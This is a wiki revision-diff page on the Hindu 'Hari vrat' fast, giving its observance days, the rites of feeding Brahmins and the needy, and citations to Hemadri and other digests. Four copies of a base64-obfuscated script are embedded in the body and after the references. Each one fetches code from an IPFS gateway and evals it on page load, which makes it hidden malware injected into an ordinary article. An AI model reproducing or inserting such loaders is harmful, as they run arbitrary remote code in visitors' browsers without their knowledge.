Difference between revisions of "हरि व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[पूर्णिमा]] एवं [[अमावास्या]] पर एकभक्त विधि से इस व्रत के सम्पादन से नरक में जाना नहीं पड़ता।  
 
*[[पूर्णिमा]] एवं [[अमावास्या]] पर एकभक्त विधि से इस व्रत के सम्पादन से नरक में जाना नहीं पड़ता।  
*इन तिथियों पर पुण्याहवाचन एवं 'जय' जैसे शब्दों के साथ हरि पूजा; एक [[ब्राह्मण]] को खिलाना, उसे प्रणाम करना तथा अन्य ब्राह्माणों, अंधों, असहायों तथा दलितों को भोज देना चाहिए।<ref>हेमाद्रि (व्रत0 2, 373, नरसिंहपुराण से उद्धरण)</ref>; <ref>कृत्यकल्पतरु (व्रत0 389-390)</ref>
+
*इन तिथियों पर पुण्याहवाचन एवं 'जय' जैसे शब्दों के साथ हरि पूजा; एक [[ब्राह्मण]] को खिलाना, उसे प्रणाम करना तथा अन्य ब्राह्माणों, अंधों, असहायों तथा दलितों को भोज देना चाहिए।<ref>हेमाद्रि (व्रत0 2, 373, नरसिंहपुराण से उद्धरण</ref>; <ref>कृत्यकल्पतरु (व्रत0 389-390</ref>
 
*[[द्वादशी]] को [[उपवास]] करने से स्वर्ग की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 1, 1172, [[वराह पुराण]] से उद्धरण)।</ref>
 
*[[द्वादशी]] को [[उपवास]] करने से स्वर्ग की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 1, 1172, [[वराह पुराण]] से उद्धरण)।</ref>
  

Latest revision as of 12:47, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • poornima evan amavasya par ekabhakt vidhi se is vrat ke sampadan se narak mean jana nahian p data.
  • in tithiyoan par punyahavachan evan 'jay' jaise shabdoan ke sath hari pooja; ek brahman ko khilana, use pranam karana tatha any brahmanoan, aandhoan, asahayoan tatha dalitoan ko bhoj dena chahie.[1]; [2]
  • dvadashi ko upavas karane se svarg ki prapti hoti hai.[3]


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat0 2, 373, narasianhapuran se uddharan
  2. krityakalpataru (vrat0 389-390
  3. hemadri (vrat0 1, 1172, varah puran se uddharan).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>